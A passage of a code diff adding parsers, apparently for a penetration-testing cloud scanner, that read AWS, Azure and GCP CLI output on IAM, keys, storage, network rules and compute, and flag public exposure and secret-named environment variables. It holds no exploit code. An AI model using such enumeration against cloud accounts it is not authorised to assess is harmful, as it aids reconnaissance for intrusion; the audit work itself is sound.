+        id: policy.PolicyId || policy.PolicyName,
+        arn: policy.Arn,
+        name: policy.PolicyName,
+        provider: "aws" as const,
+        type: policy.Arn?.includes(":aws:policy/")
+          ? ("aws-managed" as const)
+          : ("customer" as const),
+        statements: [],
+        attachedTo: [],
+        createdAt: policy.CreateDate ? new Date(policy.CreateDate).getTime() : undefined,
+        updatedAt: policy.UpdateDate ? new Date(policy.UpdateDate).getTime() : undefined,
+        isOverlyPermissive: false,
+        issues: [],
+      }))
+    } catch (err) {
+      log.error("Failed to parse IAM policies", { error: String(err) })
+      return []
+    }
+  }
+
+  /**
+   * Parse IAM policy document.
+   */
+  export function parsePolicyDocument(output: string): CloudScanTypes.IAMPolicyStatement[] {
+    try {
+      const data = JSON.parse(output)
+      const document = data.PolicyVersion?.Document || data.Document
+
+      if (!document) return []
+
+      const parsed = typeof document === "string"
+        ? JSON.parse(decodeURIComponent(document))
+        : document
+
+      const statements = parsed.Statement || []
+
+      return statements.map((stmt: any) => ({
+        sid: stmt.Sid,
+        effect: stmt.Effect,
+        actions: Array.isArray(stmt.Action) ? stmt.Action : [stmt.Action],
+        resources: Array.isArray(stmt.Resource) ? stmt.Resource : [stmt.Resource],
+        principals: stmt.Principal ? extractPrincipals(stmt.Principal) : undefined,
+        conditions: stmt.Condition,
+      }))
+    } catch (err) {
+      log.error("Failed to parse policy document", { error: String(err) })
+      return []
+    }
+  }
+
+  /**
+   * Parse IAM access keys list output.
+   */
+  export function parseAccessKeys(output: string): Array<{
+    id: string
+    status: "active" | "inactive"
+    createdAt?: number
+  }> {
+    try {
+      const data = JSON.parse(output)
+      const keys = data.AccessKeyMetadata || []
+
+      return keys.map((key: any) => ({
+        id: key.AccessKeyId,
+        status: key.Status?.toLowerCase() === "active" ? "active" : "inactive",
+        createdAt: key.CreateDate ? new Date(key.CreateDate).getTime() : undefined,
+      }))
+    } catch (err) {
+      log.error("Failed to parse access keys", { error: String(err) })
+      return []
+    }
+  }
+
+  /**
+   * Parse MFA devices output.
+   */
+  export function parseMFADevices(output: string): string[] {
+    try {
+      const data = JSON.parse(output)
+      const devices = data.MFADevices || []
+      return devices.map((d: any) => d.SerialNumber)
+    } catch (err) {
+      log.error("Failed to parse MFA devices", { error: String(err) })
+      return []
+    }
+  }
+
+  // ========== S3 Parsing ==========
+
+  /**
+   * Parse S3 buckets list output.
+   */
+  export function parseBuckets(output: string): Partial<CloudScanTypes.StorageBucket>[] {
+    try {
+      const data = JSON.parse(output)
+      const buckets = data.Buckets || []
+
+      return buckets.map((bucket: any) => ({
+        id: bucket.Name,
+        name: bucket.Name,
+        provider: "aws" as const,
+        createdAt: bucket.CreationDate ? new Date(bucket.CreationDate).getTime() : undefined,
+        accessLevel: "private" as const,
+        publicAccessBlocked: true,
+        aclEnabled: false,
+        acls: [],
+        issues: [],
+      }))
+    } catch (err) {
+      log.error("Failed to parse S3 buckets", { error: String(err) })
+      return []
+    }
+  }
+
+  /**
+   * Parse S3 bucket public access block output.
+   */
+  export function parseBucketPublicAccessBlock(output: string): {
+    blockPublicAcls: boolean
+    ignorePublicAcls: boolean
+    blockPublicPolicy: boolean
+    restrictPublicBuckets: boolean
+  } | null {
+    try {
+      const data = JSON.parse(output)
+      const config = data.PublicAccessBlockConfiguration
+
+      if (!config) return null
+
+      return {
+        blockPublicAcls: config.BlockPublicAcls ?? false,
+        ignorePublicAcls: config.IgnorePublicAcls ?? false,
+        blockPublicPolicy: config.BlockPublicPolicy ?? false,
+        restrictPublicBuckets: config.RestrictPublicBuckets ?? false,
+      }
+    } catch (err) {
+      log.error("Failed to parse bucket public access block", { error: String(err) })
+      return null
+    }
+  }
+
+  /**
+   * Parse S3 bucket encryption output.
+   */
+  export function parseBucketEncryption(output: string): CloudScanTypes.BucketEncryption | undefined {
+    try {
+      const data = JSON.parse(output)
+      const rules = data.ServerSideEncryptionConfiguration?.Rules || []
+
+      if (rules.length === 0) return undefined
+
+      const rule = rules[0]?.ApplyServerSideEncryptionByDefault
+
+      return {
+        enabled: true,
+        algorithm: rule?.SSEAlgorithm,
+        keyId: rule?.KMSMasterKeyID,
+        customerManaged: rule?.SSEAlgorithm === "aws:kms" && !!rule?.KMSMasterKeyID,
+      }
+    } catch (err) {
+      // No encryption configured
+      return { enabled: false, customerManaged: false }
+    }
+  }
+
+  /**
+   * Parse S3 bucket versioning output.
+   */
+  export function parseBucketVersioning(output: string): boolean {
+    try {
+      const data = JSON.parse(output)
+      return data.Status === "Enabled"
+    } catch {
+      return false
+    }
+  }
+
+  /**
+   * Parse S3 bucket logging output.
+   */
+  export function parseBucketLogging(output: string): boolean {
+    try {
+      const data = JSON.parse(output)
+      return !!data.LoggingEnabled
+    } catch {
+      return false
+    }
+  }
+
+  /**
+   * Parse S3 bucket policy output.
+   */
+  export function parseBucketPolicy(output: string): CloudScanTypes.IAMPolicyStatement[] {
+    try {
+      const data = JSON.parse(output)
+      const policy = data.Policy ? JSON.parse(data.Policy) : null
+
+      if (!policy) return []
+
+      const statements = policy.Statement || []
+      return statements.map((stmt: any) => ({
+        sid: stmt.Sid,
+        effect: stmt.Effect,
+        actions: Array.isArray(stmt.Action) ? stmt.Action : [stmt.Action],
+        resources: Array.isArray(stmt.Resource) ? stmt.Resource : [stmt.Resource],
+        principals: stmt.Principal ? extractPrincipals(stmt.Principal) : undefined,
+        conditions: stmt.Condition,
+      }))
+    } catch {
+      return []
+    }
+  }
+
+  // ========== EC2 Parsing ==========
+
+  /**
+   * Parse EC2 security groups output.
+   */
+  export function parseSecurityGroups(output: string): CloudScanTypes.SecurityGroup[] {
+    try {
+      const data = JSON.parse(output)
+      const groups = data.SecurityGroups || []
+
+      return groups.map((sg: any) => {
+        const inboundRules = (sg.IpPermissions || []).flatMap((perm: any) =>
+          parseSecurityGroupRules(perm, "inbound")
+        )
+        const outboundRules = (sg.IpPermissionsEgress || []).flatMap((perm: any) =>
+          parseSecurityGroupRules(perm, "outbound")
+        )
+
+        const rules = [...inboundRules, ...outboundRules]
+        const hasPublicIngress = inboundRules.some((r: CloudScanTypes.SecurityGroupRule) => r.isPublic)
+        const hasUnrestrictedIngress = inboundRules.some(
+          (r: CloudScanTypes.SecurityGroupRule) => r.isPublic && r.protocol === "-1"
+        )
+
+        return {
+          id: sg.GroupId,
+          name: sg.GroupName,
+          provider: "aws" as const,
+          description: sg.Description,
+          vpcId: sg.VpcId,
+          rules,
+          attachedResources: [],
+          hasPublicIngress,
+          hasUnrestrictedIngress,
+          issues: [],
+          tags: (sg.Tags || []).map((t: any) => ({ key: t.Key, value: t.Value })),
+        }
+      })
+    } catch (err) {
+      log.error("Failed to parse security groups", { error: String(err) })
+      return []
+    }
+  }
+
+  /**
+   * Parse EC2 instances output.
+   */
+  export function parseInstances(output: string): CloudScanTypes.ComputeInstance[] {
+    try {
+      const data = JSON.parse(output)
+      const reservations = data.Reservations || []
+
+      const instances: CloudScanTypes.ComputeInstance[] = []
+
+      for (const reservation of reservations) {
+        for (const instance of reservation.Instances || []) {
+          const nameTag = (instance.Tags || []).find((t: any) => t.Key === "Name")
+
+          instances.push({
+            id: instance.InstanceId,
+            name: nameTag?.Value || instance.InstanceId,
+            provider: "aws" as const,
+            region: undefined, // Set from context
+            instanceType: instance.InstanceType,
+            state: mapInstanceState(instance.State?.Name),
+            publicIp: instance.PublicIpAddress,
+            privateIp: instance.PrivateIpAddress,
+            vpcId: instance.VpcId,
+            subnetId: instance.SubnetId,
+            securityGroups: (instance.SecurityGroups || []).map((sg: any) => sg.GroupId),
+            iamRole: instance.IamInstanceProfile?.Arn,
+            publiclyAccessible: !!instance.PublicIpAddress,
+            imdsV2Required: instance.MetadataOptions?.HttpTokens === "required",
+            encryptedVolumes: false, // Needs separate call
+            sshKeyName: instance.KeyName,
+            issues: [],
+            tags: (instance.Tags || []).map((t: any) => ({ key: t.Key, value: t.Value })),
+          })
+        }
+      }
+
+      return instances
+    } catch (err) {
+      log.error("Failed to parse EC2 instances", { error: String(err) })
+      return []
+    }
+  }
+
+  /**
+   * Parse VPCs output.
+   */
+  export function parseVPCs(output: string): CloudScanTypes.VirtualNetwork[] {
+    try {
+      const data = JSON.parse(output)
+      const vpcs = data.Vpcs || []
+
+      return vpcs.map((vpc: any) => {
+        const nameTag = (vpc.Tags || []).find((t: any) => t.Key === "Name")
+
+        return {
+          id: vpc.VpcId,
+          name: nameTag?.Value || vpc.VpcId,
+          provider: "aws" as const,
+          cidrBlock: vpc.CidrBlock,
+          isDefault: vpc.IsDefault,
+          subnets: [],
+          securityGroups: [],
+          flowLogsEnabled: false, // Needs separate call
+          issues: [],
+        }
+      })
+    } catch (err) {
+      log.error("Failed to parse VPCs", { error: String(err) })
+      return []
+    }
+  }
+
+  // ========== Lambda Parsing ==========
+
+  /**
+   * Parse Lambda functions list output.
+   */
+  export function parseLambdaFunctions(output: string): CloudScanTypes.ServerlessFunction[] {
+    try {
+      const data = JSON.parse(output)
+      const functions = data.Functions || []
+
+      return functions.map((fn: any) => ({
+        id: fn.FunctionName,
+        arn: fn.FunctionArn,
+        name: fn.FunctionName,
+        provider: "aws" as const,
+        runtime: fn.Runtime,
+        handler: fn.Handler,
+        role: fn.Role,
+        vpcConfig: fn.VpcConfig?.VpcId
+          ? {
+              vpcId: fn.VpcConfig.VpcId,
+              subnetIds: fn.VpcConfig.SubnetIds || [],
+              securityGroupIds: fn.VpcConfig.SecurityGroupIds || [],
+            }
+          : undefined,
+        publiclyAccessible: false, // Check resource policy
+        envVarsWithSecrets: detectSecretsInEnv(fn.Environment?.Variables || {}),
+        hasResourcePolicy: false,
+        issues: [],
+        tags: [],
+      }))
+    } catch (err) {
+      log.error("Failed to parse Lambda functions", { error: String(err) })
+      return []
+    }
+  }
+
+  // ========== Helper Functions ==========
+
+  function extractTrustedEntities(policyDoc: any): string[] {
+    if (!policyDoc) return []
+
+    try {
+      const parsed = typeof policyDoc === "string"
+        ? JSON.parse(decodeURIComponent(policyDoc))
+        : policyDoc
+
+      const statements = parsed.Statement || []
+      const entities: string[] = []
+
+      for (const stmt of statements) {
+        if (stmt.Effect === "Allow" && stmt.Principal) {
+          entities.push(...extractPrincipals(stmt.Principal))
+        }
+      }
+
+      return [...new Set(entities)]
+    } catch {
+      return []
+    }
+  }
+
+  function extractPrincipals(principal: any): string[] {
+    if (!principal) return []
+    if (principal === "*") return ["*"]
+    if (typeof principal === "string") return [principal]
+
+    const entities: string[] = []
+
+    if (principal.AWS) {
+      const aws = Array.isArray(principal.AWS) ? principal.AWS : [principal.AWS]
+      entities.push(...aws)
+    }
+    if (principal.Service) {
+      const svc = Array.isArray(principal.Service) ? principal.Service : [principal.Service]
+      entities.push(...svc)
+    }
+    if (principal.Federated) {
+      const fed = Array.isArray(principal.Federated) ? principal.Federated : [principal.Federated]
+      entities.push(...fed)
+    }
+
+    return entities
+  }
+
+  function parseSecurityGroupRules(
+    perm: any,
+    direction: "inbound" | "outbound"
+  ): CloudScanTypes.SecurityGroupRule[] {
+    const rules: CloudScanTypes.SecurityGroupRule[] = []
+    const protocol = perm.IpProtocol === "-1" ? "-1" : perm.IpProtocol
+    const portRange = perm.FromPort !== undefined
+      ? { from: perm.FromPort, to: perm.ToPort }
+      : undefined
+
+    // IPv4 ranges
+    for (const range of perm.IpRanges || []) {
+      const isPublic = CloudScanTypes.PUBLIC_CIDRS.includes(range.CidrIp)
+      rules.push({
+        direction,
+        protocol,
+        portRange,
+        source: range.CidrIp,
+        description: range.Description,
+        isPublic,
+        issues: [],
+      })
+    }
+
+    // IPv6 ranges
+    for (const range of perm.Ipv6Ranges || []) {
+      const isPublic = CloudScanTypes.PUBLIC_CIDRS.includes(range.CidrIpv6)
+      rules.push({
+        direction,
+        protocol,
+        portRange,
+        source: range.CidrIpv6,
+        description: range.Description,
+        isPublic,
+        issues: [],
+      })
+    }
+
+    // Security group references
+    for (const ref of perm.UserIdGroupPairs || []) {
+      rules.push({
+        direction,
+        protocol,
+        portRange,
+        source: ref.GroupId,
+        description: ref.Description,
+        isPublic: false,
+        issues: [],
+      })
+    }
+
+    // Prefix lists
+    for (const ref of perm.PrefixListIds || []) {
+      rules.push({
+        direction,
+        protocol,
+        portRange,
+        source: ref.PrefixListId,
+        description: ref.Description,
+        isPublic: false,
+        issues: [],
+      })
+    }
+
+    return rules
+  }
+
+  function mapInstanceState(state: string | undefined): CloudScanTypes.ComputeInstance["state"] {
+    switch (state) {
+      case "running":
+        return "running"
+      case "stopped":
+        return "stopped"
+      case "terminated":
+        return "terminated"
+      case "pending":
+      case "shutting-down":
+      case "stopping":
+        return "pending"
+      default:
+        return "unknown"
+    }
+  }
+
+  function detectSecretsInEnv(env: Record<string, string>): string[] {
+    const secretPatterns = [
+      /password/i,
+      /secret/i,
+      /api_key/i,
+      /apikey/i,
+      /token/i,
+      /credential/i,
+      /private_key/i,
+      /access_key/i,
+    ]
+
+    return Object.keys(env).filter((key) =>
+      secretPatterns.some((pattern) => pattern.test(key))
+    )
+  }
+}
diff --git a/packages/opencode/src/pentest/cloudscan/parsers/azure-cli.ts b/packages/opencode/src/pentest/cloudscan/parsers/azure-cli.ts
new file mode 100644
index 00000000000..9d243e0000d
--- /dev/null
+++ b/packages/opencode/src/pentest/cloudscan/parsers/azure-cli.ts
@@ -0,0 +1,418 @@
+/**
+ * @fileoverview Azure CLI Output Parser
+ *
+ * Parses JSON output from Azure CLI commands.
+ *
+ * @module pentest/cloudscan/parsers/azure-cli
+ */
+
+import { CloudScanTypes } from "../types"
+import { Log } from "../../../util/log"
+
+const log = Log.create({ service: "cloudscan.parser.azure-cli" })
+
+/**
+ * Azure CLI parser namespace.
+ */
+export namespace AzureCLIParser {
+  // ========== RBAC Parsing ==========
+
+  /**
+   * Parse Azure AD users list output.
+   */
+  export function parseUsers(output: string): CloudScanTypes.IAMPrincipal[] {
+    try {
+      const users = JSON.parse(output)
+
+      return (Array.isArray(users) ? users : []).map((user: any) => ({
+        id: user.id || user.objectId,
+        name: user.displayName || user.userPrincipalName,
+        email: user.userPrincipalName || user.mail,
+        provider: "azure" as const,
+        type: "user" as const,
+        createdAt: user.createdDateTime ? new Date(user.createdDateTime).getTime() : undefined,
+        mfaEnabled: false, // Needs separate Graph API call
+        accessKeys: [],
+        inlinePolicies: [],
+        attachedPolicies: [],
+        groups: [],
+        roles: [],
+        permissions: [],
+        issues: [],
+      }))
+    } catch (err) {
+      log.error("Failed to parse Azure AD users", { error: String(err) })
+      return []
+    }
+  }
+
+  /**
+   * Parse Azure AD groups list output.
+   */
+  export function parseGroups(output: string): CloudScanTypes.IAMGroup[] {
+    try {
+      const groups = JSON.parse(output)
+
+      return (Array.isArray(groups) ? groups : []).map((group: any) => ({
+        id: group.id || group.objectId,
+        name: group.displayName,
+        provider: "azure" as const,
+        members: [],
+        inlinePolicies: [],
+        attachedPolicies: [],
+        createdAt: group.createdDateTime ? new Date(group.createdDateTime).getTime() : undefined,
+      }))
+    } catch (err) {
+      log.error("Failed to parse Azure AD groups", { error: String(err) })
+      return []
+    }
+  }
+
+  /**
+   * Parse Azure role definitions output.
+   */
+  export function parseRoleDefinitions(output: string): CloudScanTypes.IAMRole[] {
+    try {
+      const roles = JSON.parse(output)
+
+      return (Array.isArray(roles) ? roles : []).map((role: any) => ({
+        id: role.id || role.name,
+        name: role.roleName || role.properties?.roleName,
+        provider: "azure" as const,
+        description: role.description || role.properties?.description,
+        trustedEntities: [],
+        inlinePolicies: [],
+        attachedPolicies: [],
+        assumableBy: role.properties?.assignableScopes || [],
+        isServiceLinked: role.properties?.type === "BuiltInRole",
+        issues: [],
+      }))
+    } catch (err) {
+      log.error("Failed to parse Azure role definitions", { error: String(err) })
+      return []
+    }
+  }
+
+  /**
+   * Parse Azure role assignments output.
+   */
+  export function parseRoleAssignments(output: string): Array<{
+    principalId: string
+    principalName?: string
+    roleDefinitionId: string
+    roleName?: string
+    scope: string
+  }> {
+    try {
+      const assignments = JSON.parse(output)
+
+      return (Array.isArray(assignments) ? assignments : []).map((assignment: any) => ({
+        principalId: assignment.principalId,
+        principalName: assignment.principalName,
+        roleDefinitionId: assignment.roleDefinitionId,
+        roleName: assignment.roleDefinitionName,
+        scope: assignment.scope,
+      }))
+    } catch (err) {
+      log.error("Failed to parse Azure role assignments", { error: String(err) })
+      return []
+    }
+  }
+
+  /**
+   * Parse Azure service principals output.
+   */
+  export function parseServicePrincipals(output: string): CloudScanTypes.IAMPrincipal[] {
+    try {
+      const principals = JSON.parse(output)
+
+      return (Array.isArray(principals) ? principals : []).map((sp: any) => ({
+        id: sp.id || sp.objectId,
+        name: sp.displayName || sp.appDisplayName,
+        provider: "azure" as const,
+        type: "service-account" as const,
+        createdAt: sp.createdDateTime ? new Date(sp.createdDateTime).getTime() : undefined,
+        mfaEnabled: false,
+        accessKeys: (sp.passwordCredentials || []).map((cred: any) => ({
+          id: cred.keyId,
+          status: new Date(cred.endDateTime) > new Date() ? "active" : "inactive",
+          createdAt: cred.startDateTime ? new Date(cred.startDateTime).getTime() : undefined,
+        })),
+        inlinePolicies: [],
+        attachedPolicies: [],
+        groups: [],
+        roles: [],
+        permissions: [],
+        issues: [],
+      }))
+    } catch (err) {
+      log.error("Failed to parse Azure service principals", { error: String(err) })
+      return []
+    }
+  }
+
+  // ========== Storage Parsing ==========
+
+  /**
+   * Parse Azure storage accounts list output.
+   */
+  export function parseStorageAccounts(output: string): Partial<CloudScanTypes.StorageBucket>[] {
+    try {
+      const accounts = JSON.parse(output)
+
+      return (Array.isArray(accounts) ? accounts : []).map((account: any) => {
+        const isPublic = account.allowBlobPublicAccess === true
+        const hasEncryption = account.encryption?.services?.blob?.enabled ?? false
+
+        return {
+          id: account.id || account.name,
+          name: account.name,
+          provider: "azure" as const,
+          region: account.location,
+          createdAt: account.creationTime ? new Date(account.creationTime).getTime() : undefined,
+          accessLevel: isPublic ? "public-read" : "private",
+          publicAccessBlocked: !isPublic,
+          aclEnabled: false,
+          acls: [],
+          encryption: {
+            enabled: hasEncryption,
+            algorithm: account.encryption?.services?.blob?.keyType,
+            customerManaged: account.encryption?.keySource === "Microsoft.Keyvault",
+          },
+          versioningEnabled: false, // Needs blob service properties
+          loggingEnabled: false, // Needs diagnostic settings
+          issues: [],
+        }
+      })
+    } catch (err) {
+      log.error("Failed to parse Azure storage accounts", { error: String(err) })
+      return []
+    }
+  }
+
+  /**
+   * Parse Azure storage containers list output.
+   */
+  export function parseStorageContainers(output: string): Array<{
+    name: string
+    publicAccess: string | null
+    lastModified: number | undefined
+  }> {
+    try {
+      const containers = JSON.parse(output)
+
+      return (Array.isArray(containers) ? containers : []).map((container: any) => ({
+        name: container.name,
+        publicAccess: container.properties?.publicAccess || null,
+        lastModified: container.properties?.lastModified
+          ? new Date(container.properties.lastModified).getTime()
+          : undefined,
+      }))
+    } catch (err) {
+      log.error("Failed to parse Azure storage containers", { error: String(err) })
+      return []
+    }
+  }
+
+  // ========== Network Parsing ==========
+
+  /**
+   * Parse Azure NSGs list output.
+   */
+  export function parseNetworkSecurityGroups(output: string): CloudScanTypes.SecurityGroup[] {
+    try {
+      const nsgs = JSON.parse(output)
+
+      return (Array.isArray(nsgs) ? nsgs : []).map((nsg: any) => {
+        const rules = parseNSGRules(nsg.securityRules || [])
+        const defaultRules = parseNSGRules(nsg.defaultSecurityRules || [])
+        const allRules = [...rules, ...defaultRules]
+
+        const hasPublicIngress = allRules.some(
+          (r) => r.direction === "inbound" && r.isPublic
+        )
+        const hasUnrestrictedIngress = allRules.some(
+          (r) =>
+            r.direction === "inbound" &&
+            r.isPublic &&
+            r.protocol === "*"
+        )
+
+        return {
+          id: nsg.id || nsg.name,
+          name: nsg.name,
+          provider: "azure" as const,
+          description: nsg.tags?.description,
+          region: nsg.location,
+          rules: allRules,
+          attachedResources: (nsg.networkInterfaces || []).map((nic: any) => nic.id),
+          hasPublicIngress,
+          hasUnrestrictedIngress,
+          issues: [],
+          tags: Object.entries(nsg.tags || {}).map(([key, value]) => ({
+            key,
+            value: String(value),
+          })),
+        }
+      })
+    } catch (err) {
+      log.error("Failed to parse Azure NSGs", { error: String(err) })
+      return []
+    }
+  }
+
+  /**
+   * Parse Azure VNets list output.
+   */
+  export function parseVirtualNetworks(output: string): CloudScanTypes.VirtualNetwork[] {
+    try {
+      const vnets = JSON.parse(output)
+
+      return (Array.isArray(vnets) ? vnets : []).map((vnet: any) => ({
+        id: vnet.id || vnet.name,
+        name: vnet.name,
+        provider: "azure" as const,
+        region: vnet.location,
+        cidrBlock: (vnet.addressSpace?.addressPrefixes || [])[0] || "",
+        isDefault: false,
+        subnets: (vnet.subnets || []).map((subnet: any) => subnet.id || subnet.name),
+        securityGroups: [],
+        flowLogsEnabled: false, // Needs Network Watcher check
+        issues: [],
+      }))
+    } catch (err) {
+      log.error("Failed to parse Azure VNets", { error: String(err) })
+      return []
+    }
+  }
+
+  // ========== Compute Parsing ==========
+
+  /**
+   * Parse Azure VMs list output.
+   */
+  export function parseVirtualMachines(output: string): CloudScanTypes.ComputeInstance[] {
+    try {
+      const vms = JSON.parse(output)
+
+      return (Array.isArray(vms) ? vms : []).map((vm: any) => {
+        const publicIp = vm.publicIps || vm.networkProfile?.networkInterfaces?.[0]?.publicIpAddress
+
+        return {
+          id: vm.id || vm.name,
+          name: vm.name,
+          provider: "azure" as const,
+          region: vm.location,
+          instanceType: vm.hardwareProfile?.vmSize,
+          state: mapVMState(vm.powerState || vm.provisioningState),
+          publicIp: publicIp,
+          privateIp: vm.privateIps || vm.networkProfile?.networkInterfaces?.[0]?.privateIpAddress,
+          vpcId: undefined, // Azure uses VNets differently
+          subnetId: undefined,
+          securityGroups: [],
+          iamRole: vm.identity?.principalId,
+          publiclyAccessible: !!publicIp,
+          imdsV2Required: false, // Azure uses different IMDS
+          encryptedVolumes: vm.storageProfile?.osDisk?.encryptionSettings?.enabled ?? false,
+          issues: [],
+          tags: Object.entries(vm.tags || {}).map(([key, value]) => ({
+            key,
+            value: String(value),
+          })),
+        }
+      })
+    } catch (err) {
+      log.error("Failed to parse Azure VMs", { error: String(err) })
+      return []
+    }
+  }
+
+  /**
+   * Parse Azure Functions list output.
+   */
+  export function parseFunctionApps(output: string): CloudScanTypes.ServerlessFunction[] {
+    try {
+      const apps = JSON.parse(output)
+
+      return (Array.isArray(apps) ? apps : []).map((app: any) => ({
+        id: app.id || app.name,
+        name: app.name,
+        provider: "azure" as const,
+        region: app.location,
+        runtime: app.siteConfig?.linuxFxVersion || app.siteConfig?.netFrameworkVersion,
+        role: app.identity?.principalId,
+        vpcConfig: app.virtualNetworkSubnetId
+          ? {
+              vpcId: "",
+              subnetIds: [app.virtualNetworkSubnetId],
+              securityGroupIds: [],
+            }
+          : undefined,
+        publiclyAccessible: !app.siteConfig?.ipSecurityRestrictions?.length,
+        envVarsWithSecrets: [],
+        hasResourcePolicy: false,
+        issues: [],
+        tags: Object.entries(app.tags || {}).map(([key, value]) => ({
+          key,
+          value: String(value),
+        })),
+      }))
+    } catch (err) {
+      log.error("Failed to parse Azure Function Apps", { error: String(err) })
+      return []
+    }
+  }
+
+  // ========== Helper Functions ==========
+
+  function parseNSGRules(rules: any[]): CloudScanTypes.SecurityGroupRule[] {
+    return rules.map((rule: any) => {
+      const isInbound = rule.direction?.toLowerCase() === "inbound"
+      const sourceAddr = rule.sourceAddressPrefix || rule.sourceAddressPrefixes?.[0] || "*"
+      const destAddr = rule.destinationAddressPrefix || rule.destinationAddressPrefixes?.[0] || "*"
+      const isPublic = CloudScanTypes.PUBLIC_CIDRS.includes(sourceAddr) ||
+        sourceAddr === "*" ||
+        sourceAddr === "Internet"
+
+      return {
+        id: rule.name,
+        direction: isInbound ? "inbound" : "outbound",
+        protocol: rule.protocol || "*",
+        portRange: parsePortRange(rule.destinationPortRange || rule.destinationPortRanges?.[0]),
+        source: sourceAddr,
+        destination: destAddr,
+        description: rule.description,
+        isPublic: isInbound && isPublic,
+        issues: [],
+      }
+    })
+  }
+
+  function parsePortRange(range: string | undefined): { from: number; to: number } | undefined {
+    if (!range || range === "*") return undefined
+
+    if (range.includes("-")) {
+      const [from, to] = range.split("-").map(Number)
+      return { from, to }
+    }
+
+    const port = parseInt(range, 10)
+    if (!isNaN(port)) {
+      return { from: port, to: port }
+    }
+
+    return undefined
+  }
+
+  function mapVMState(state: string | undefined): CloudScanTypes.ComputeInstance["state"] {
+    if (!state) return "unknown"
+
+    const lower = state.toLowerCase()
+    if (lower.includes("running")) return "running"
+    if (lower.includes("stopped") || lower.includes("deallocated")) return "stopped"
+    if (lower.includes("deleted")) return "terminated"
+    if (lower.includes("creating") || lower.includes("starting")) return "pending"
+
+    return "unknown"
+  }
+}
diff --git a/packages/opencode/src/pentest/cloudscan/parsers/gcloud.ts b/packages/opencode/src/pentest/cloudscan/parsers/gcloud.ts
new file mode 100644
index 00000000000..9b2b2f84845
--- /dev/null
+++ b/packages/opencode/src/pentest/cloudscan/parsers/gcloud.ts
@@ -0,0 +1,518 @@
+/**
+ * @fileoverview GCloud CLI Output Parser
+ *
+ * Parses JSON output from gcloud CLI commands.
+ *
+ * @module pentest/cloudscan/parsers/gcloud
+ */
+
+import { CloudScanTypes } from "../types"
+import { Log } from "../../../util/log"
+
+const log = Log.create({ service: "cloudscan.parser.gcloud" })
+
+/**
+ * GCloud CLI parser namespace.
+ */
+export namespace GCloudParser {
+  // ========== IAM Parsing ==========
+
+  /**
+   * Parse GCP IAM service accounts list output.
+   */
+  export function parseServiceAccounts(output: string): CloudScanTypes.IAMPrincipal[] {
+    try {
+      const accounts = JSON.parse(output)
+
+      return (Array.isArray(accounts) ? accounts : []).map((sa: any) => ({
+        id: sa.uniqueId || sa.email,
+        arn: sa.name,
+        name: sa.displayName || sa.email?.split("@")[0],
+        email: sa.email,
+        provider: "gcp" as const,
+        type: "service-account" as const,
+        createdAt: undefined,
+        mfaEnabled: false,
+        accessKeys: [],
+        inlinePolicies: [],
+        attachedPolicies: [],
+        groups: [],
+        roles: [],
+        permissions: [],
+        issues: [],
+      }))
+    } catch (err) {
+      log.error("Failed to parse GCP service accounts", { error: String(err) })
+      return []
+    }
+  }
+
+  /**
+   * Parse GCP service account keys output.
+   */
+  export function parseServiceAccountKeys(output: string): Array<{
+    id: string
+    status: "active" | "inactive"
+    createdAt?: number
+  }> {
+    try {
+      const keys = JSON.parse(output)
+
+      return (Array.isArray(keys) ? keys : []).map((key: any) => ({
+        id: key.name?.split("/").pop() || key.keyId,
+        status: key.disabled ? "inactive" : "active",
+        createdAt: key.validAfterTime ? new Date(key.validAfterTime).getTime() : undefined,
+      }))
+    } catch (err) {
+      log.error("Failed to parse GCP service account keys", { error: String(err) })
+      return []
+    }
+  }
+
+  /**
+   * Parse GCP IAM policy output.
+   */
+  export function parseIAMPolicy(output: string): Array<{
+    role: string
+    members: string[]
+  }> {
+    try {
+      const data = JSON.parse(output)
+      const bindings = data.bindings || []
+
+      return bindings.map((binding: any) => ({
+        role: binding.role,
+        members: binding.members || [],
+      }))
+    } catch (err) {
+      log.error("Failed to parse GCP IAM policy", { error: String(err) })
+      return []
+    }
+  }
+
+  /**
+   * Parse GCP custom roles output.
+   */
+  export function parseCustomRoles(output: string): CloudScanTypes.IAMRole[] {
+    try {
+      const roles = JSON.parse(output)
+
+      return (Array.isArray(roles) ? roles : []).map((role: any) => ({
+        id: role.name,
+        name: role.title || role.name?.split("/").pop(),
+        provider: "gcp" as const,
+        description: role.description,
+        trustedEntities: [],
+        inlinePolicies: [],
+        attachedPolicies: (role.includedPermissions || []).map((p: string) => p),
+        assumableBy: [],
+        isServiceLinked: role.name?.startsWith("roles/"),
+        issues: analyzeGCPRolePermissions(role.includedPermissions || []),
+      }))
+    } catch (err) {
+      log.error("Failed to parse GCP custom roles", { error: String(err) })
+      return []
+    }
+  }
+
+  // ========== Storage Parsing ==========
+
+  /**
+   * Parse GCS buckets list output.
+   */
+  export function parseBuckets(output: string): Partial<CloudScanTypes.StorageBucket>[] {
+    try {
+      const buckets = JSON.parse(output)
+
+      return (Array.isArray(buckets) ? buckets : []).map((bucket: any) => ({
+        id: bucket.id || bucket.name,
+        name: bucket.name,
+        provider: "gcp" as const,
+        region: bucket.location,
+        createdAt: bucket.timeCreated ? new Date(bucket.timeCreated).getTime() : undefined,
+        accessLevel: mapGCSAccessLevel(bucket.iamConfiguration?.uniformBucketLevelAccess?.enabled),
+        publicAccessBlocked: bucket.iamConfiguration?.publicAccessPrevention === "enforced",
+        aclEnabled: !bucket.iamConfiguration?.uniformBucketLevelAccess?.enabled,
+        acls: [],
+        encryption: bucket.encryption?.defaultKmsKeyName
+          ? {
+              enabled: true,
+              keyId: bucket.encryption.defaultKmsKeyName,
+              customerManaged: true,
+            }
+          : { enabled: true, customerManaged: false }, // GCS always encrypts
+        versioningEnabled: bucket.versioning?.enabled ?? false,
+        loggingEnabled: !!bucket.logging?.logBucket,
+        issues: [],
+      }))
+    } catch (err) {
+      log.error("Failed to parse GCS buckets", { error: String(err) })
+      return []
+    }
+  }
+
+  /**
+   * Parse GCS bucket IAM policy output.
+   */
+  export function parseBucketIAMPolicy(output: string): {
+    isPublic: boolean
+    bindings: Array<{ role: string; members: string[] }>
+  } {
+    try {
+      const data = JSON.parse(output)
+      const bindings = data.bindings || []
+
+      const isPublic = bindings.some((binding: any) =>
+        (binding.members || []).some(
+          (member: string) =>
+            member === "allUsers" || member === "allAuthenticatedUsers"
+        )
+      )
+
+      return {
+        isPublic,
+        bindings: bindings.map((b: any) => ({
+          role: b.role,
+          members: b.members || [],
+        })),
+      }
+    } catch (err) {
+      log.error("Failed to parse GCS bucket IAM policy", { error: String(err) })
+      return { isPublic: false, bindings: [] }
+    }
+  }
+
+  // ========== Network Parsing ==========
+
+  /**
